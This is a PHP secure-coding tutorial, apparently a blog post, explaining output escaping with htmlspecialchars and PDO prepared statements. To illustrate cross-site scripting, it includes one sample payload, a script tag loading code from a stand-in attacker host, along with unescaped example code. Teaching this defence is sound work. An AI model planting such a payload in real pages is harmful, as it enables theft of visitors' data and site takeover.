Escaping your output
Output escaping happens when you tell your PHP script to output some content, usually to a web page, but also to other servers, or XML files, or even the command-line. Every kind of output needs to be escaped differently, which means PHP never does it automatically. So you need to learn what escaping is, and how, when, and why to do it.
Why escape output?
The short answer is that if you don't, unexpected things can happen, and a lot of those things are either bad, or very bad indeed.
For a longer answer, you need to know more about the principle of what you're doing. I'll use HTML as an example, because it's the most common case and it's pretty straightforward to explain.
An HTML document contains plain text and tags. Tags are commands that tell a browser to mark up a section of text, or insert, say, an image, or a button. The document contains both at the same time, all written in plain text. To do that, the HTML standard reserves some characters, most importantly: <, >, ", ', and &. When a browser sees a < followed by some letters, it thinks "great, time to show another picture of a kitten".
But what if you want to show a < in your text? Well, HTML has simple commands called 'entities' that let you show any character without your web browser mistaking them for commands. In this case, the entity for < is <, and the process of writing one as the other is known as escaping.
So when you've got someone's name from them with your clever script and you want to put it in your web page so that it says, "Hey Matt, how's it going?", what you're intending to do is send plain text, not commands. That means you have to turn all the command characters in that text (like < and >) into HTML entities (like < and >). And that's what output escaping is.
If you don't do it, someone with unusual parents might be called <script src="http://evilsite.com/take_over_the_world.js"></script>, and your simple greeting just turned into what's known as a Cross-Site Scripting (XSS) attack. XSS attacks happen when you fail to escape your output, and an attacker gets to put HTML and Javascript on your site, which then runs on your visitors' web browsers. It can do anything from ruin your layout, to embedding adverts, to stealing personal data like passwords. Sophisticated attackers can even take over your site by making privileged users do things with their login without their permission.
Output escaping stops this happening by making sure that you never send commands (HTML) when you only mean to send plain text. Along with filtering input, it's one of the standard procedures that every coder needs to use almost constantly.
By the way…
Escaping handles output, but you also need to filter to make sure you're only accepting what you expect. I've written a separate article about that here, but the principle is that if you're expecting a number, throw out everything that isn't a number, and if you're expecting a name, throw out everything that looks like HTML. Using both input filtering and output escaping gives you a defence in depth that protects your code, your server, and your site visitors. Read more…
When to escape your output
Generally, the best time to escape your output is as you're displaying it. This is because the kind of escaping you need to do depends on what you're displaying and where. As a trivial example, say you have a form where someone fills in their name, and then you save it to your database and then show it on screen. You need to escape separately and differently for both uses, and if you escape too soon, you'll end up making mistakes like double-escaping.
Another good reason to apply escaping as you're displaying is that it's much easier to tell that you haven't done it yet. Instead of having to look back through all your scripts, you only have to look at the template ones.
And finally, leaving the output escaping to your templates makes it much easier to reuse your code. For example you can reuse the same bit of code that asks the database for a blog entry for your web page when making an RSS feed, without having to change it. The less code you have to write, the less can go wrong with it.
How to escape your output
Output plain text to a web page
When you're doing this, what you need to make sure of is that you don't let any of your text get mistaken for HTML. So all you need to do is turn < to <, > to >, and & to &. Fortunately there's a nice little command that does this for you:
Instead of:
<?php echo $name; ?>
Use:
<?php echo htmlspecialchars($name, ENT_NOQUOTES); ?>
Output plain text into an HTML tag
Perhaps the most common example of this is when you're filling in a form for someone, so I'll use that as an example.
Instead of:
<input type="text" name="name" value="<?php echo $name; ?>">
Use:
<input type="text" name="name" value="<?php echo htmlspecialchars($name, ENT_QUOTES)?>">
If you're obsessive like me, and you only ever use double-quotes " in your HTML tags, then you can use ENT_COMPAT instead of ENT_QUOTES.
By the way…
This is why you should avoid printing HTML, like <?php print "<b>Hi $name</b>"; ?>. When your commands and your variables are all mixed up like that, it's really hard to get output escaping right! If you find yourself doing this a lot, think about using a template language instead. There are hundreds to choose from, and any template language worth its salt will automatically handle output escaping for you.
Output HTML to a web page
The real problem here is that you can't actually do any escaping – you're actually trying to print commands to the browser. Instead, you have to rely on filtering to make sure that you only allow good HTML through. Filtering HTML is a big topic, but there's a brief description of it on my PHP Filtering article. Don't think you can tackle this problem without a lot of knowledge though; it's much, much safer to use a filtering script that someone's already written, something like htmLawed or HTMLPurifier.
Creating XML
If you're using a library or tool to generate XML (e.g. PHP's SimpleXML, DOMDocument, or XMLWriter extensions), it should handle output escaping for you. If you're crazy enough to write it by hand, the good news is that you can just use htmlspecialchars() exactly like in the HTML instructions above.
Don't use htmlentities() though, because XML only has about 6 entities by default, and you'll get a tonne of validation errors if you try to write things like ©.
Talking to a database
The syntax for escaping when talking to a database depends on the database itself. For example mysql's default is that you need to put a \ in front of every ', but MS SQL Server's default is that you need to put two single-quotes together like '' if you mean to show one. Every database driver in PHP has a way of doing this for you. Never ever use addslashes(), it won't do what you think it does, and your database will be vulnerable to attack (which in some cases means your whole server is vulnerable).
There's a much better alternative to output escaping when it comes to databases. It's called a prepared statement. What you do is write your SQL without any of the data in it, and put in placeholders instead. PHP then sends the statement through one channel (that only allows commands), and the data through another (that never allows commands). Using prepared statements means you don't have to worry about escaping, and it guarantees that no one can do what's known as an SQL injection attack.
Most databases now offer this, and the easiest way to take advantage of them in PHP is by using the built-in PDO extension. I'll write more about using PDO and prepared statements another day, but here's a very brief example:
<?php
$db = new PDO('mysql:host=hostname;dbname=defaultDbName',
'username', 'password',
array(PDO::MYSQL_ATTR_INIT_COMMAND => "SET NAMES utf8"));
$query = 'SELECT * FROM my_table WHERE title = :title';
$stmt = $db->prepare($query);
$stmt->bindValue(':title', $myTitle);
$stmt->execute();
while($row = $stmt->fetch(PDO::FETCH_ASSOC)) {
// ...
}
?>
Other times you need to do output escaping
- Sending email
- Writing to Javascript (be very careful)
- Making JSON (PHP 5.2's
json_encode()does this for you) - Almost everywhere else!